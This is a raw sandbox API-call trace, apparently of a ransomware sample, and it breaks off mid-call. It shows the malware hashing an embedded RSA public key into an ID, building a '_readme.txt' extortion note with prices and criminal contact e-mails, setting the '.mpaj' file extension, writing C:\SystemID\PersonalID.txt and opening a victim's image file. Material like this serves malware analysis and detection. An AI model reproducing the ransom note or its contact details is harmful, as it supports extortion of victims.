KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 496 [0167.664] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5f0) returned 0x31b86a0 [0167.665] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b80a8 | out: hHeap=0x260000) returned 1 [0167.665] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b7cc0 | out: hHeap=0x260000) returned 1 [0167.673] CryptAcquireContextW (in: phProv=0x18d55c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d55c*=0x2bf558) returned 1 [0167.759] CryptCreateHash (in: hProv=0x2bf558, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d560 | out: phHash=0x18d560) returned 1 [0167.759] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 495 [0167.759] CryptHashData (hHash=0x3206f70, pbData=0x31b86a0, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0167.759] CryptGetHashParam (in: hHash=0x3206f70, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d564, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d564) returned 1 [0167.759] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x11) returned 0x3182c38 [0167.759] CryptGetHashParam (in: hHash=0x3206f70, dwParam=0x2, pbData=0x3182c38, pdwDataLen=0x18d564, dwFlags=0x0 | out: pbData=0x3182c38, pdwDataLen=0x18d564) returned 1 [0167.759] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x34) returned 0x3206fb0 [0167.759] GetLastError () returned 0x0 [0167.759] lstrcatA (in: lpString1="", lpString2="61" | out: lpString1="61") returned="61" [0167.759] GetLastError () returned 0x0 [0167.759] lstrcatA (in: lpString1="61", lpString2="F1" | out: lpString1="61F1") returned="61F1" [0167.759] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F1", lpString2="77" | out: lpString1="61F177") returned="61F177" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F177", lpString2="24" | out: lpString1="61F17724") returned="61F17724" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F17724", lpString2="68" | out: lpString1="61F1772468") returned="61F1772468" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F1772468", lpString2="57" | out: lpString1="61F177246857") returned="61F177246857" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F177246857", lpString2="0C" | out: lpString1="61F1772468570C") returned="61F1772468570C" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F1772468570C", lpString2="01" | out: lpString1="61F1772468570C01") returned="61F1772468570C01" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F1772468570C01", lpString2="19" | out: lpString1="61F1772468570C0119") returned="61F1772468570C0119" [0167.760] GetLastError () returned 0x0 [0167.760] lstrcatA (in: lpString1="61F1772468570C0119", lpString2="3C" | out: lpString1="61F1772468570C01193C") returned="61F1772468570C01193C" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C", lpString2="91" | out: lpString1="61F1772468570C01193C91") returned="61F1772468570C01193C91" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C91", lpString2="7D" | out: lpString1="61F1772468570C01193C917D") returned="61F1772468570C01193C917D" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C917D", lpString2="D2" | out: lpString1="61F1772468570C01193C917DD2") returned="61F1772468570C01193C917DD2" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C917DD2", lpString2="B3" | out: lpString1="61F1772468570C01193C917DD2B3") returned="61F1772468570C01193C917DD2B3" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C917DD2B3", lpString2="0C" | out: lpString1="61F1772468570C01193C917DD2B30C") returned="61F1772468570C01193C917DD2B30C" [0167.761] GetLastError () returned 0x0 [0167.761] lstrcatA (in: lpString1="61F1772468570C01193C917DD2B30C", lpString2="BD" | out: lpString1="61F1772468570C01193C917DD2B30CBD") returned="61F1772468570C01193C917DD2B30CBD" [0167.761] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3182c38 | out: hHeap=0x260000) returned 1 [0167.761] CryptDestroyHash (hHash=0x3206f70) returned 1 [0167.761] CryptReleaseContext (hProv=0x2bf558, dwFlags=0x0) returned 1 [0167.761] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b86a0 | out: hHeap=0x260000) returned 1 [0167.761] lstrlenA (lpString="61F1772468570C01193C917DD2B30CBD") returned 32 [0167.761] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x3e0) returned 0x3204bc0 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5ef) returned 0x31b8590 [0167.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x31b8590, cbMultiByte=1519, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 496 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x5f0) returned 0x3207f58 [0167.762] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0167.762] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3204bc0 | out: hHeap=0x260000) returned 1 [0167.762] lstrcpyA (in: lpString1=0x31b1220, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0167.762] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3207f58 | out: hHeap=0x260000) returned 1 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x304488 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x3206090 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31df650 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31df8b8 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31dfb20 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31dfd88 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31dfff0 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e0258 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e04c0 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e0728 [0167.762] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e0990 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e0bf8 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x816) returned 0x3207f58 [0167.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d568, cbMultiByte=-1, lpWideCharStr=0x3207f58, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x820) returned 0x3208778 [0167.763] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3207f58 | out: hHeap=0x260000) returned 1 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x32060c0 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e0e60 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e10c8 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1330 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1598 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1800 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1a68 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1cd0 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e1f38 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e21a0 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31e2408 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x31fa948 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x3204bc0 [0167.763] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31fa948 | out: hHeap=0x260000) returned 1 [0167.763] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1d0) returned 0x3204cf8 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3204bc0 | out: hHeap=0x260000) returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2b7) returned 0x3204ed0 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3204cf8 | out: hHeap=0x260000) returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x412) returned 0x31b8590 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3204ed0 | out: hHeap=0x260000) returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x61a) returned 0x3204bc0 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x440) returned 0x31b8590 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1066) returned 0x3208fa0 [0167.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31b8590, cbMultiByte=-1, lpWideCharStr=0x3208fa0, cchWideChar=2099 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-9o703iSIHn\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nhelpdatarestore@firemail.cc\r\n\r\nYour personal ID:\r\n0219OIWojlj48") returned 1076 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1070) returned 0x320a010 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3208fa0 | out: hHeap=0x260000) returned 1 [0167.764] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x32060f0 [0167.764] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cafe0 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cb248 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cb4b0 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cb718 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cb980 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cbbe8 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cbe50 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cc0b8 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cc320 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cc588 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80a) returned 0x3207f58 [0167.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d568, cbMultiByte=-1, lpWideCharStr=0x3207f58, cchWideChar=1029 | out: lpWideCharStr=".mpaj") returned 6 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x810) returned 0x3208fa0 [0167.765] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3207f58 | out: hHeap=0x260000) returned 1 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x31f7348 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x30) returned 0x318f3a0 [0167.765] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x283560 | out: hHeap=0x260000) returned 1 [0167.765] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3a48 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x48) returned 0x31c5f20 [0167.766] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x318f3a0 | out: hHeap=0x260000) returned 1 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x304420 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x304350 [0167.766] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c5f20 | out: hHeap=0x260000) returned 1 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac440 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x90) returned 0x31c370 [0167.766] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304350 | out: hHeap=0x260000) returned 1 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3aa0 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3af8 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xd8) returned 0x349cf0 [0167.766] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31c370 | out: hHeap=0x260000) returned 1 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac488 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x20) returned 0x31f7730 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3b50 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x138) returned 0x31b8590 [0167.766] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x349cf0 | out: hHeap=0x260000) returned 1 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x60) returned 0x304350 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac4d0 [0167.766] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3ba8 [0167.767] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x50) returned 0x31e3c00 [0167.767] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1c8) returned 0x31bdfe0 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0167.767] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x40) returned 0x31ac518 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f7fe8 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f7348 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3a48 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304420 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac440 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3aa0 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3af8 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac488 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31f7730 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3b50 | out: hHeap=0x260000) returned 1 [0167.767] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x304350 | out: hHeap=0x260000) returned 1 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac4d0 | out: hHeap=0x260000) returned 1 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3ba8 | out: hHeap=0x260000) returned 1 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31e3c00 | out: hHeap=0x260000) returned 1 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31ac518 | out: hHeap=0x260000) returned 1 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31bdfe0 | out: hHeap=0x260000) returned 1 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x28) returned 0x3206120 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cc7f0 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cca58 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x31cccc0 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320b0a0 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320b308 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320b570 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320b7d8 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320ba40 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320bca8 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x25c) returned 0x320bf10 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0xa0) returned 0x31fa948 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x130) returned 0x31b8590 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31fa948 | out: hHeap=0x260000) returned 1 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x1d0) returned 0x31b86c8 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b8590 | out: hHeap=0x260000) returned 1 [0167.768] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x2b7) returned 0x31b88a0 [0167.768] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b86c8 | out: hHeap=0x260000) returned 1 [0167.769] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x412) returned 0x3207f58 [0167.769] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x31b88a0 | out: hHeap=0x260000) returned 1 [0167.769] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x61a) returned 0x31b8590 [0167.769] HeapFree (in: hHeap=0x260000, dwFlags=0x0, lpMem=0x3207f58 | out: hHeap=0x260000) returned 1 [0167.769] GetUserNameW (in: lpBuffer=0x18d768, pcbBuffer=0x18d5dc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x18d5dc) returned 1 [0170.937] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x590) returned 0x3236c00 [0170.937] GetLastError () returned 0x0 [0170.949] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18d2d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0170.949] GetLastError () returned 0x3 [0170.949] GetLastError () returned 0x3 [0170.949] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0170.950] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18d2d0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x68c [0170.951] GetFileType (hFile=0x68c) returned 0x1 [0170.951] GetLastError () returned 0x0 [0170.959] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0170.959] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0170.959] RegisterClassExW (param_1=0x18d548) returned 0xc168 [0170.960] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, 